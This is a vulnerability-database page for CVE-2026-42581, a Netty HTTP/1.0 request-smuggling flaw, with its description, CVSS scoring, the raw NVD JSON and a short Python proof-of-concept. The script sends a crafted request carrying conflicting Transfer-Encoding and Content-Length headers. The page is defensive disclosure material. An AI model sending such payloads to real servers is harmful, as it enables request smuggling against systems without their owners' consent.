Security Vulnerability Report
中文
CVE-2026-42581 CVSS 5.8 MEDIUM

CVE-2026-42581

Published: 2026-05-13 19:17:24
Last Modified: 2026-05-14 16:26:50
Source: [email protected]

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Netty 4.1.x < 4.1.133.Final
Netty 4.2.x < 4.2.13.Final

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Target host and port host = 'target.example.com' port = 80 # Malicious HTTP/1.0 request with both Transfer-Encoding and Content-Length # Netty will decode as chunked but forward Content-Length payload = ( "POST / HTTP/1.0\r\n" "Host: {}\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Transfer-Encoding: chunked\r\n" "Content-Length: 10\r\n" "Connection: keep-alive\r\n" "\r\n" "5\r\n" "Hello\r\n" "0\r\n" "\r\n" ).format(host) def send_request(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload.encode()) response = s.recv(4096) print(response.decode()) s.close() if __name__ == "__main__": send_request()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42581", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:23.627", "lastModified": "2026-05-14T16:26:50.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-444"}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9", "source": "[email protected]"}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.